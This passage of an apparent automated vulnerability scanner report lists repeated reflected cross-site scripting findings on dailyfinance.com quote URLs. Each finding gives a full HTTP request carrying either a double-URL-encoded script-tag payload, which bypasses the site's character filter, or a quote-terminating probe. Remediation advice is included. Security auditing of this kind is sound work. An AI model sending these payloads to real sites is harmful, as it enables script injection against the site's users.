Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/nasdaq-composite/$compx54f7c'%3be9a331d34e1/nai HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60751%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2fd436ea4f0 was submitted in the REST URL parameter 3. This input was echoed as 60751"><script>alert(1)</script>2fd436ea4f0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/nasdaq-composite/$compx60751%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2fd436ea4f0/nai HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fbf2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f3cf8f4bfb was submitted in the REST URL parameter 3. This input was echoed as 6fbf2"><script>alert(1)</script>4f3cf8f4bfb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/neophotoniocs-corporation/nptn6fbf2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f3cf8f4bfb/nys HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8185c'%3b67ee1fb4501 was submitted in the REST URL parameter 3. This input was echoed as 8185c';67ee1fb4501 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/neophotoniocs-corporation/nptn8185c'%3b67ee1fb4501/nys HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 169b3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4549f5c5ea1 was submitted in the REST URL parameter 3. This input was echoed as 169b3"><script>alert(1)</script>4549f5c5ea1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/nikkei-225/n225169b3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4549f5c5ea1/fx1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98575'%3b6a7a2a27058 was submitted in the REST URL parameter 3. This input was echoed as 98575';6a7a2a27058 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/nikkei-225/n22598575'%3b6a7a2a27058/fx1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d847%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee3d50cf7382 was submitted in the REST URL parameter 3. This input was echoed as 3d847"><script>alert(1)</script>e3d50cf7382 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/platinum-futures-apr-2011-composite/3d847%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee3d50cf7382/nym HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15bff'%3be5c6e90dd88 was submitted in the REST URL parameter 3. This input was echoed as 15bff';e5c6e90dd88 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/platinum-futures-apr-2011-composite/15bff'%3be5c6e90dd88/nym HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6943a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec2c491ec6c6 was submitted in the REST URL parameter 3. This input was echoed as 6943a"><script>alert(1)</script>c2c491ec6c6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/sandp-500-index-rth/$inx6943a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec2c491ec6c6/cmi HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ef6f'%3b35cf4eb1a12 was submitted in the REST URL parameter 3. This input was echoed as 1ef6f';35cf4eb1a12 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/sandp-500-index-rth/$inx1ef6f'%3b35cf4eb1a12/cmi HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1db1a'%3b3125b1eb027 was submitted in the REST URL parameter 3. This input was echoed as 1db1a';3125b1eb027 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/spdr-sandp-500-etf-tr/spy1db1a'%3b3125b1eb027/nys HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4112d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e078d6794cf7 was submitted in the REST URL parameter 3. This input was echoed as 4112d"><script>alert(1)</script>078d6794cf7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/spdr-sandp-500-etf-tr/spy4112d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e078d6794cf7/nys HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d530'%3b6f3b3da09e was submitted in the REST URL parameter 3. This input was echoed as 3d530';6f3b3da09e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/sprint-nextel-corporation/s3d530'%3b6f3b3da09e/nys HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68fb1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7362bd8fb93 was submitted in the REST URL parameter 3. This input was echoed as 68fb1"><script>alert(1)</script>7362bd8fb93 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/sprint-nextel-corporation/s68fb1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7362bd8fb93/nys HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26e1e'%3b030ba315ab8 was submitted in the REST URL parameter 3. This input was echoed as 26e1e';030ba315ab8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/ten-year-u-s-treasury-note/(tc10y26e1e'%3b030ba315ab8/bss HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bc32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e163bd5df29e was submitted in the REST URL parameter 3. This input was echoed as 4bc32"><script>alert(1)</script>163bd5df29e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/ten-year-u-s-treasury-note/(tc10y4bc32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e163bd5df29e/bss HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ffb8c'%3b35d689f372e was submitted in the REST URL parameter 3. This input was echoed as ffb8c';35d689f372e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/uk-sterling-b-vs-united-states-dollar-spot-gbp-usd/gbpusdffb8c'%3b35d689f372e/fx1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cb01%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eba2fbb7d72e was submitted in the REST URL parameter 3. This input was echoed as 3cb01"><script>alert(1)</script>ba2fbb7d72e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/uk-sterling-b-vs-united-states-dollar-spot-gbp-usd/gbpusd3cb01%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eba2fbb7d72e/fx1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7fec%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5404f246cc9 was submitted in the REST URL parameter 3. This input was echoed as e7fec"><script>alert(1)</script>5404f246cc9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/united-states-dollar-b-vs-japanese-yen-spot-usd-jpy/usdjpye7fec%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5404f246cc9/fx1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 981fb'%3bc52383b8215 was submitted in the REST URL parameter 3. This input was echoed as 981fb';c52383b8215 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/united-states-dollar-b-vs-japanese-yen-spot-usd-jpy/usdjpy981fb'%3bc52383b8215/fx1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c349'%3b9fff4749479 was submitted in the REST URL parameter 3. This input was echoed as 9c349';9fff4749479 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
